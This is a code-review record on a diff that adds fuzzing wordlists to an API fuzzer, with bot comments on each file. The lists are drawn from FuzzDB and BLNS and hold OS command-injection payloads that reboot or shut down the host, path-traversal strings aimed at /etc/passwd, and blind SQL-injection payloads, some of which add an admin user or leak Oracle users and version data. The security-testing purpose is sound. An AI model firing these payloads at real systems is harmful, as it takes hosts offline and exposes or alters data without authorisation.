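Review bot: `Parameter` is a plain data holder whose `__init__` only copies five arguments onto `self`; a standard-library `@dataclass` (with `from dataclasses import dataclass` added to the imports) states the same contract in the field list and supplies `__repr__` and `__eq__`, which makes these objects readable in fuzz logs and comparable in tests. The field meanings are not obvious from the names alone, so a short class docstring saying what `is_from_config` distinguishes (presumably a value supplied by the configuration rather than by the API documentation — worth confirming against the caller) would help.
```python
@dataclass
class Parameter:
    name: str
    value: str
    data_type: Union[str, None]
    data_format: Union[str, None]
    is_from_config: bool
```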


@@ -0,0 +1,72 @@
# Source: BLNS (https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt)
0
1
1.00
$1.00
1/2
1E2
1E02
1E+02
-1
-1.00
-$1.00
-1/2
-1E2
-1E02
-1E+02
1/0
0/0
-2147483648/-1
-9223372036854775808/-1
-0
-0.0
+0
+0.0
0.00
0..0
.
0.0.0
0,00
0,,0
,
0,0,0
0.0/0
1.0/0.0
0.0/0.0
1,0/0,0
0,0/0,0
--1
-
-.
-,
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
NaN
Infinity
-Infinity
INF
1#INF
-1#IND
1#QNAN
1#SNAN
1#IND
0x0
0xffffffff
0xffffffffffffffff
0xabad1dea
123456789012345678901234567890123456789
1,000.00
1 000.00
1'000.00
1,000,000.00
1 000 000.00
1'000'000.00
1.000,00
1 000,00
1'000,00
1.000.000,00
1 000 000,00
1'000'000,00
01000
08
09
2.2250738585072011e-308


@@ -0,0 +1,155 @@
# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/integer-overflow/integer-overflows.txt)
-1
0
0x100
0x1000
0x3fffffff
0x7ffffffe
0x7fffffff
0x80000000
0xfffffffe
0xffffffff
0x10000
0x100000
100
1000
3fffffff
7ffffffe
7fffffff
80000000
fffffffe
ffffffff
10000
100000
256
4096
1073741823
2147483646
2147483647
2147483648
4294967294
4294967295
65536
1048576
# Custom overflows
# UNSIGNED
# 8b -> 255
255
0xff
ff
11111111
0b11111111
# 8b -> 256
256
0x100
100
100000000
0b100000000
# 8b -> 257
257
0x101
101
100000001
0b100000001
# 16b -> 65535
65535
0xffff
ffff
1111111111111111
0b1111111111111111
# 16b -> 65536
65536
0x10000
10000
10000000000000000
0b10000000000000000
# 16b -> 65537
65537
0x10001
10001
10000000000000001
0b10000000000000001
# 32b -> 4294967295
4294967295
0xffffffff
ffffffff
11111111111111111111111111111111
0b11111111111111111111111111111111
# 32b -> 4294967296
4294967296
0x100000000
100000000
100000000000000000000000000000000
0b100000000000000000000000000000000
# 32b -> 4294967297
4294967297
0x100000001
100000001
100000000000000000000000000000001
0b100000000000000000000000000000001
# 64b -> 18446744073709551615
18446744073709551615
0xffffffffffffffff
ffffffffffffffff
1111111111111111111111111111111111111111111111111111111111111111
0b1111111111111111111111111111111111111111111111111111111111111111
# 64b -> 18446744073709551616
18446744073709551616
0x10000000000000000
10000000000000000
10000000000000000000000000000000000000000000000000000000000000000
0b10000000000000000000000000000000000000000000000000000000000000000
# 64b -> 18446744073709551617
18446744073709551617
0x10000000000000001
10000000000000001
10000000000000000000000000000000000000000000000000000000000000001
0b10000000000000000000000000000000000000000000000000000000000000001
# SIGNED (just in decimal)
# 8b -> 127
127
126
128
-127
-128
-129
# 16b -> 32767
32767
32766
32768
-32767
-32769
-32768
# 32b -> 2147483647
2147483647
2147483646
2147483648
-2147483647
-2147483649
-2147483648
# 64b -> 9223372036854775808
9223372036854775808
9223372036854775807
9223372036854775809
-9223372036854775808
-9223372036854775810
-9223372036854775809


@@ -0,0 +1,2 @@
NaN
inf


@@ -0,0 +1,175 @@
# Based on FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/os-cmd-execution/command-injection-template.txt)
reboot
;reboot
;reboot;
^reboot
|reboot
<reboot
<reboot;
<reboot\n
<reboot%0D
<reboot%0A
&reboot
&reboot&
&&reboot
&&reboot&&
%0Dreboot
%0Dreboot%0D
%0Areboot
%0Areboot%0A
\nreboot
\nreboot\n
'reboot'
`reboot`
;reboot|
;reboot/n
|reboot;
a);reboot
a;reboot
a);reboot
a;reboot;
a);reboot|
FAIL||reboot
CMD=$'reboot';$CMD
;CMD=$'reboot';$CMD
^CMD=$'reboot';$CMD
|CMD=$'reboot';$CMD
&CMD=$'reboot';$CMD
&&CMD=$'reboot';$CMD
%0DCMD=$'reboot';$CMD
FAIL||CMD=$'reboot';$CMD
CMD=$\'reboot\';$CMD
;CMD=$\'reboot\';$CMD
^CMD=$\'reboot\';$CMD
|CMD=$\'reboot\';$CMD
&CMD=$\'reboot\';$CMD
&&CMD=$\'reboot\';$CMD
%0DCMD=$\'reboot\';$CMD
FAIL||CMD=$\'reboot\';$CMD
CMD=$"reboot";$CMD
;CMD=$"reboot";$CMD
^CMD=$"reboot";$CMD
|CMD=$"reboot";$CMD
&CMD=$"reboot";$CMD
&&CMD=$"reboot";$CMD
%0DCMD=$"reboot";$CMD
FAIL||CMD=$"reboot";$CMD
<!--#exec cmd="reboot"-->
;system('reboot')
shutdown
;shutdown
;shutdown;
^shutdown
|shutdown
<shutdown
<shutdown;
<shutdown\n
<shutdown%0D
<shutdown%0A
&shutdown
&shutdown&
&&shutdown
&&shutdown&&
%0Dshutdown
%0Dshutdown%0D
%0Ashutdown
%0Ashutdown%0A
\nshutdown
\nshutdown\n
'shutdown'
`shutdown`
;shutdown|
;shutdown/n
|shutdown;
a);shutdown
a;shutdown
a);shutdown
a;shutdown;
a);shutdown|
FAIL||shutdown
CMD=$'shutdown';$CMD
;CMD=$'shutdown';$CMD
^CMD=$'shutdown';$CMD
|CMD=$'shutdown';$CMD
&CMD=$'shutdown';$CMD
&&CMD=$'shutdown';$CMD
%0DCMD=$'shutdown';$CMD
FAIL||CMD=$'shutdown';$CMD
CMD=$\'shutdown\';$CMD
;CMD=$\'shutdown\';$CMD
^CMD=$\'shutdown\';$CMD
|CMD=$\'shutdown\';$CMD
&CMD=$\'shutdown\';$CMD
&&CMD=$\'shutdown\';$CMD
%0DCMD=$\'shutdown\';$CMD
FAIL||CMD=$\'shutdown\';$CMD
CMD=$"shutdown";$CMD
;CMD=$"shutdown";$CMD
^CMD=$"shutdown";$CMD
|CMD=$"shutdown";$CMD
&CMD=$"shutdown";$CMD
&&CMD=$"shutdown";$CMD
%0DCMD=$"shutdown";$CMD
FAIL||CMD=$"shutdown";$CMD
<!--#exec cmd="shutdown"-->
;system('shutdown')
sleep 20000
;sleep 20000
;sleep 20000;
^sleep 20000
|sleep 20000
<sleep 20000
<sleep 20000;
<sleep 20000\n
<sleep 20000%0D
<sleep 20000%0A
&sleep 20000
&sleep 20000&
&&sleep 20000
&&sleep 20000&&
%0Dsleep 20000
%0Dsleep 20000%0D
%0Asleep 20000
%0Asleep 20000%0A
\nsleep 20000
\nsleep 20000\n
'sleep 20000'
`sleep 20000`
;sleep 20000|
;sleep 20000/n
|sleep 20000;
a);sleep 20000
a;sleep 20000
a);sleep 20000
a;sleep 20000;
a);sleep 20000|
FAIL||sleep 20000
CMD=$'sleep 20000';$CMD
;CMD=$'sleep 20000';$CMD
^CMD=$'sleep 20000';$CMD
|CMD=$'sleep 20000';$CMD
&CMD=$'sleep 20000';$CMD
&&CMD=$'sleep 20000';$CMD
%0DCMD=$'sleep 20000';$CMD
FAIL||CMD=$'sleep 20000';$CMD
CMD=$\'sleep 20000\';$CMD
;CMD=$\'sleep 20000\';$CMD
^CMD=$\'sleep 20000\';$CMD
|CMD=$\'sleep 20000\';$CMD
&CMD=$\'sleep 20000\';$CMD
&&CMD=$\'sleep 20000\';$CMD
%0DCMD=$\'sleep 20000\';$CMD
FAIL||CMD=$\'sleep 20000\';$CMD
CMD=$"sleep 20000";$CMD
;CMD=$"sleep 20000";$CMD
^CMD=$"sleep 20000";$CMD
|CMD=$"sleep 20000";$CMD
&CMD=$"sleep 20000";$CMD
&&CMD=$"sleep 20000";$CMD
%0DCMD=$"sleep 20000";$CMD
FAIL||CMD=$"sleep 20000";$CMD
<!--#exec cmd="sleep 20000"-->
;system('sleep 20000')
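Review bot: The `reboot` and `shutdown` rows are destructive: if any of these injections lands, the target is taken offline mid-run instead of merely detected, and `sleep 20000` ties up the injected process for more than five hours. Time-based detection only needs a delay a little longer than the HTTP client's timeout, so a non-destructive marker such as `sleep 5` (or a harmless command like `id`) gives the same signal without wrecking the target. The `;reboot/n` row carries a literal `/n` instead of `\n` (inherited from the FuzzDB template), so it tests nothing that `;reboot;` does not. A header comment stating that this list must only be run against hosts the operator is authorised to take down would make the risk explicit.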


@@ -0,0 +1,117 @@
# Based on FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/os-cmd-execution/command-injection-template.txt)
timeout 20000
;timeout 20000
;timeout 20000;
^timeout 20000
|timeout 20000
<timeout 20000
<timeout 20000;
<timeout 20000\n
<timeout 20000%0D
<timeout 20000%0A
&timeout 20000
&timeout 20000&
&&timeout 20000
&&timeout 20000&&
%0Dtimeout 20000
%0Dtimeout 20000%0D
%0Atimeout 20000
%0Atimeout 20000%0A
\ntimeout 20000
\ntimeout 20000\n
'timeout 20000'
`timeout 20000`
;timeout 20000|
;timeout 20000/n
|timeout 20000;
a);timeout 20000
a;timeout 20000
a);timeout 20000
a;timeout 20000;
a);timeout 20000|
FAIL||timeout 20000
CMD=$'timeout 20000';$CMD
;CMD=$'timeout 20000';$CMD
^CMD=$'timeout 20000';$CMD
|CMD=$'timeout 20000';$CMD
&CMD=$'timeout 20000';$CMD
&&CMD=$'timeout 20000';$CMD
%0DCMD=$'timeout 20000';$CMD
FAIL||CMD=$'timeout 20000';$CMD
CMD=$\'timeout 20000\';$CMD
;CMD=$\'timeout 20000\';$CMD
^CMD=$\'timeout 20000\';$CMD
|CMD=$\'timeout 20000\';$CMD
&CMD=$\'timeout 20000\';$CMD
&&CMD=$\'timeout 20000\';$CMD
%0DCMD=$\'timeout 20000\';$CMD
FAIL||CMD=$\'timeout 20000\';$CMD
CMD=$"timeout 20000";$CMD
;CMD=$"timeout 20000";$CMD
^CMD=$"timeout 20000";$CMD
|CMD=$"timeout 20000";$CMD
&CMD=$"timeout 20000";$CMD
&&CMD=$"timeout 20000";$CMD
%0DCMD=$"timeout 20000";$CMD
FAIL||CMD=$"timeout 20000";$CMD
<!--#exec cmd="timeout 20000"-->
;system('timeout 20000')
shutdown -h now
;shutdown -h now
;shutdown -h now;
^shutdown -h now
|shutdown -h now
<shutdown -h now
<shutdown -h now;
<shutdown -h now\n
<shutdown -h now%0D
<shutdown -h now%0A
&shutdown -h now
&shutdown -h now&
&&shutdown -h now
&&shutdown -h now&&
%0Dshutdown -h now
%0Dshutdown -h now%0D
%0Ashutdown -h now
%0Ashutdown -h now%0A
\nshutdown -h now
\nshutdown -h now\n
'shutdown -h now'
`shutdown -h now`
;shutdown -h now|
;shutdown -h now/n
|shutdown -h now;
a);shutdown -h now
a;shutdown -h now
a);shutdown -h now
a;shutdown -h now;
a);shutdown -h now|
FAIL||shutdown -h now
CMD=$'shutdown -h now';$CMD
;CMD=$'shutdown -h now';$CMD
^CMD=$'shutdown -h now';$CMD
|CMD=$'shutdown -h now';$CMD
&CMD=$'shutdown -h now';$CMD
&&CMD=$'shutdown -h now';$CMD
%0DCMD=$'shutdown -h now';$CMD
FAIL||CMD=$'shutdown -h now';$CMD
CMD=$\'shutdown -h now\';$CMD
;CMD=$\'shutdown -h now\';$CMD
^CMD=$\'shutdown -h now\';$CMD
|CMD=$\'shutdown -h now\';$CMD
&CMD=$\'shutdown -h now\';$CMD
&&CMD=$\'shutdown -h now\';$CMD
%0DCMD=$\'shutdown -h now\';$CMD
FAIL||CMD=$\'shutdown -h now\';$CMD
CMD=$"shutdown -h now";$CMD
;CMD=$"shutdown -h now";$CMD
^CMD=$"shutdown -h now";$CMD
|CMD=$"shutdown -h now";$CMD
&CMD=$"shutdown -h now";$CMD
&&CMD=$"shutdown -h now";$CMD
%0DCMD=$"shutdown -h now";$CMD
FAIL||CMD=$"shutdown -h now";$CMD
<!--#exec cmd="shutdown -h now"-->
;system('shutdown -h now')
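Review bot: `shutdown -h now` halts the host outright when the injection succeeds, which is a destructive outcome for a fuzzing run, and `timeout 20000` (the Windows wait command) blocks the injected shell for over five hours where `timeout 5` would already be detectable. The file also mixes a Windows-only command (`timeout`) with a Unix-only one (`shutdown -h now`); if it is meant as the Windows counterpart of the previous list, say so in a header comment and keep the rows to one platform. `;timeout 20000/n` carries the same `/n`-for-`\n` slip as the FuzzDB template.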


@@ -0,0 +1,16 @@
# RELATIVE PATHS
../../../../../../../../../../../../../../../../../apache/logs/access.log
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../apache/logs/
../../../../../../../../../../../../../../../../../etc/
../../../../../../../../../../../../../../../../../opt/
../../../../../../../../../../../../../../../../../var/
# ABSOLUTE PATHS
/apache/logs/access.log
/etc/passwd
/apache/logs/
/etc/
/opt/
/var/


@@ -0,0 +1,23 @@
# RELATIVE PATHS
../../../../../../../../../../../../../../../../../boot.ini
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
../../../../../../../../../../../../../../../../../
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\
../../../../../../../../../../../../../../../../../inetpub/wwwroot/index.asp
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\inetpub\wwwroot\index.asp
../../../../../../../../../../../../../../../../../inetpub/wwwroot/
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\inetpub\wwwroot\
# ABSOLUTE PATHS
c:\boot.ini
c:\
c:\inetpub\wwwroot\index.asp
c:\inetpub\
c:\pagefile.sys
c:\Windows\system.ini
c:\Windows\
c:\Windows\System32\drivers\etc\hosts
c:\Windows\System32\drivers\etc\


@@ -0,0 +1,12 @@
# Generic relative paths
../../../../../../../../../../../../../../../../../unknown/unknown.log
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\unknown/unknown.log
../../../../../../../../../../../../../../../../../unknown
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\unknown
# Windows absolute paths
c:\unknown\unknown
# UNIX absolute paths
/unknown/unknown
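Review bot: `..\..\…\..\unknown/unknown.log` mixes the backslash traversal prefix with a forward-slash filename, whereas every other row in the three path lists keeps one separator style throughout. If mixed separators are intended as a normalisation probe, a comment such as `# mixed separators on purpose: exercises path normalisation` should say so; otherwise `..\..\…\..\unknown\unknown.log` is the consistent form.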


@@ -0,0 +1,257 @@
# Generated
%00
%01
%02
%03
%04
%05
%06
%07
%08
%09
%0a
%0b
%0c
%0d
%0e
%0f
%10
%11
%12
%13
%14
%15
%16
%17
%18
%19
%1a
%1b
%1c
%1d
%1e
%1f
%20
%21
%22
%23
%24
%25
%26
%27
%28
%29
%2a
%2b
%2c
%2d
%2e
%2f
%30
%31
%32
%33
%34
%35
%36
%37
%38
%39
%3a
%3b
%3c
%3d
%3e
%3f
%40
%41
%42
%43
%44
%45
%46
%47
%48
%49
%4a
%4b
%4c
%4d
%4e
%4f
%50
%51
%52
%53
%54
%55
%56
%57
%58
%59
%5a
%5b
%5c
%5d
%5e
%5f
%60
%61
%62
%63
%64
%65
%66
%67
%68
%69
%6a
%6b
%6c
%6d
%6e
%6f
%70
%71
%72
%73
%74
%75
%76
%77
%78
%79
%7a
%7b
%7c
%7d
%7e
%7f
%80
%81
%82
%83
%84
%85
%86
%87
%88
%89
%8a
%8b
%8c
%8d
%8e
%8f
%90
%91
%92
%93
%94
%95
%96
%97
%98
%99
%9a
%9b
%9c
%9d
%9e
%9f
%a0
%a1
%a2
%a3
%a4
%a5
%a6
%a7
%a8
%a9
%aa
%ab
%ac
%ad
%ae
%af
%b0
%b1
%b2
%b3
%b4
%b5
%b6
%b7
%b8
%b9
%ba
%bb
%bc
%bd
%be
%bf
%c0
%c1
%c2
%c3
%c4
%c5
%c6
%c7
%c8
%c9
%ca
%cb
%cc
%cd
%ce
%cf
%d0
%d1
%d2
%d3
%d4
%d5
%d6
%d7
%d8
%d9
%da
%db
%dc
%dd
%de
%df
%e0
%e1
%e2
%e3
%e4
%e5
%e6
%e7
%e8
%e9
%ea
%eb
%ec
%ed
%ee
%ef
%f0
%f1
%f2
%f3
%f4
%f5
%f6
%f7
%f8
%f9
%fa
%fb
%fc
%fd
%fe
%ff


@@ -0,0 +1,258 @@
# Generated


























!
"
#
$
%
&
'
(
)
*
+
,
-
.
/
0
1
2
3
4
5
6
7
8
9
:
;
<
=
>
?
@
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
[
\
]
^
_
`
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
{
|
}
~

<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
<EFBFBD>
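Review bot: A newline-delimited wordlist cannot carry the bytes 0x0A and 0x0D as entries, because the line reader splits on them; that is consistent with the first section of this file showing only 26 empty rows for the 32 control bytes. The 0x80–0xFF rows render here as U+FFFD, so the file either holds raw non-UTF-8 bytes (which a text-mode loader will reject or replace) or the bytes were already lost on commit — either way the high-byte half of the list is unlikely to reach the target intact. The robust form is to not store raw bytes at all and generate them in the loader, e.g. `[bytes([i]) for i in range(256)]`, or to keep only the `%xx` list from the previous file and decode it on load. If this file is kept, a header comment must state the encoding the loader has to open it with.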



@@ -0,0 +1,57 @@
# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/control-chars/NullByteRepresentations.txt)
%00
%00%00
\0
\0\
\00
\00\
\0\0
\0\0\
\0\0
\00\00\
\000
\000\
\0000
\0000\
\x00
\x00\
\x00\x00
\x00\x00\
\x0000
\x0000\
\x00000000
\x00000000\
\u0000
\u0000\
\u00000000
\u00000000\
\u0000\u0000
\u0000\u0000\
\z
\z\
NUL
NULL
nul
null
FALSE
false
0x00
0x0000
0x00000000
&#0;
&#x0;
"\u0000"
u"\u0000"
0
00
0000
00000000
%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00
%C0%80
%E0%80%80
%F0%80%80%80
%F8%80%80%80%80
%FC%80%80%80%80%80
%FE%80%80%80%80%80%80
<EFBFBD>
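Review bot: The last row renders as U+FFFD, so the intended byte (a raw NUL, or an invalid UTF-8 lead byte?) cannot be told from the file, and a text-mode loader will either drop it or raise on it. Either state the intended byte in a comment or express it as an escape the loader decodes — `%00` is already on the first row, so a raw NUL here adds nothing a text reader can deliver. A short comment on the long `%00…` row giving its repeat count would also help readers see it is a length probe rather than a paste error.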


@@ -0,0 +1,33 @@
.
,
+
-
_
;
/
|
#
<
>
?
!
\
"
'
`
*
(
)
[
]
{
}
^
~
=
@
$
&
:
%


@@ -0,0 +1,34 @@
# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/sql-injection/detect/GenericBlind.txt)
sleep(200000)
sleep(200000)#
1 or sleep(200000)#
" or sleep(200000)#
' or sleep(200000)#
" or sleep(200000)="
' or sleep(200000)='
1) or sleep(200000)#
") or sleep(200000)="
') or sleep(200000)='
1)) or sleep(200000)#
")) or sleep(200000)="
')) or sleep(200000)='
;waitfor delay '0:0:200000'--
);waitfor delay '0:0:200000'--
';waitfor delay '0:0:200000'--
";waitfor delay '0:0:200000'--
');waitfor delay '0:0:200000'--
");waitfor delay '0:0:200000'--
));waitfor delay '0:0:200000'--
'));waitfor delay '0:0:200000'--
"));waitfor delay '0:0:200000'--
benchmark(1000000000,MD5(1))#
1 or benchmark(1000000000,MD5(1))#
" or benchmark(1000000000,MD5(1))#
' or benchmark(1000000000,MD5(1))#
1) or benchmark(1000000000,MD5(1))#
") or benchmark(1000000000,MD5(1))#
') or benchmark(1000000000,MD5(1))#
1)) or benchmark(1000000000,MD5(1))#
")) or benchmark(1000000000,MD5(1))#
')) or benchmark(1000000000,MD5(1))#
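Review bot: `sleep(200000)` holds the injected query open for roughly 55 hours and `benchmark(1000000000,MD5(1))` pins a database core for a long time, so a successful injection becomes a denial of service on the target while the client only ever sees a timeout. The FuzzDB source uses 20 seconds; a delay just beyond the HTTP client's read timeout, e.g. `sleep(10)`, separates injected from baseline requests just as well. SQL Server's `WAITFOR DELAY` takes an `hh:mm:ss` value below 24 hours, so `'0:0:200000'` is likely rejected rather than honoured, which silently turns those rows into negative tests.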


@@ -0,0 +1,52 @@
# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/sql-injection/payloads-sql-blind)
# Origin source: http://funoverip.net/2010/12/blind-sql-injection-detection-with-burp-suite/
'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:200000' --
'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:200000' --
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:200000' --
'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:200000' --
'; if not(select system_user) <> 'sa' waitfor delay '0:0:200000' --
'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:200000' --
'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:200000' --
'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:200000' --
waitfor delay '0:0:200000' /*
waitfor delay '0:0:200000' --
' waitfor delay '0:0:200000' /*
' waitfor delay '0:0:200000' --
" waitfor delay '0:0:200000' /*
" waitfor delay '0:0:200000' --
) waitfor delay '0:0:200000' /*
) waitfor delay '0:0:200000' --
)) waitfor delay '0:0:200000' /*
)) waitfor delay '0:0:200000' --
))) waitfor delay '0:0:200000' /*
))) waitfor delay '0:0:200000' --
)))) waitfor delay '0:0:200000' /*
)))) waitfor delay '0:0:200000' --
))))) waitfor delay '0:0:200000' --
)))))) waitfor delay '0:0:200000' --
') waitfor delay '0:0:200000' /*
') waitfor delay '0:0:200000' --
") waitfor delay '0:0:200000' /*
") waitfor delay '0:0:200000' --
')) waitfor delay '0:0:200000' /*
')) waitfor delay '0:0:200000' --
")) waitfor delay '0:0:200000' /*
")) waitfor delay '0:0:200000' --
'))) waitfor delay '0:0:200000' /*
'))) waitfor delay '0:0:200000' --
"))) waitfor delay '0:0:200000' /*
"))) waitfor delay '0:0:200000' --
')))) waitfor delay '0:0:200000' /*
')))) waitfor delay '0:0:200000' --
")))) waitfor delay '0:0:200000' /*
")))) waitfor delay '0:0:200000' --
'))))) waitfor delay '0:0:200000' /*
'))))) waitfor delay '0:0:200000' --
"))))) waitfor delay '0:0:200000' /*
"))))) waitfor delay '0:0:200000' --
')))))) waitfor delay '0:0:200000' /*
')))))) waitfor delay '0:0:200000' --
")))))) waitfor delay '0:0:200000' /*
")))))) waitfor delay '0:0:200000' --


@@ -0,0 +1,22 @@
# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/sql-injection/payloads-sql-blind)
# Origin source: http://funoverip.net/2010/12/blind-sql-injection-detection-with-burp-suite/
1
1 and user_name() = 'dbo'
\'; desc users; --
1\'1
1' and non_existant_table = '1
' or username is not NULL or username = '
1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
1 uni/**/on select all from where
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 or 1=1
1' or '1'='1
1or1=1
1'or'1'='1
fake@ema'or'il.nl'='il.nl
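Review bot: `1 exec sp_ (or exec xp_)` is an editorial note carried over from the FuzzDB source, not a payload; sent verbatim it only tests a parenthesised string. Replace it with a concrete probe such as `1; exec sp_who --` or drop it. `1 uni/**/on select all from where` is likewise an evasion-syntax illustration rather than a complete statement; a header comment saying this list targets error-based detection (malformed SQL provoking a different response) would explain why incomplete statements are acceptable here.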


@@ -0,0 +1,58 @@
# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/sql-injection/payloads-sql-blind)
# Origin source: http://funoverip.net/2010/12/blind-sql-injection-detection-with-burp-suite/
or 1=1
' or '1'='1
'||utl_http.request('httP://192.168.1.1/')||'
' || myappadmin.adduser('admin', 'newpass') || '
' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i
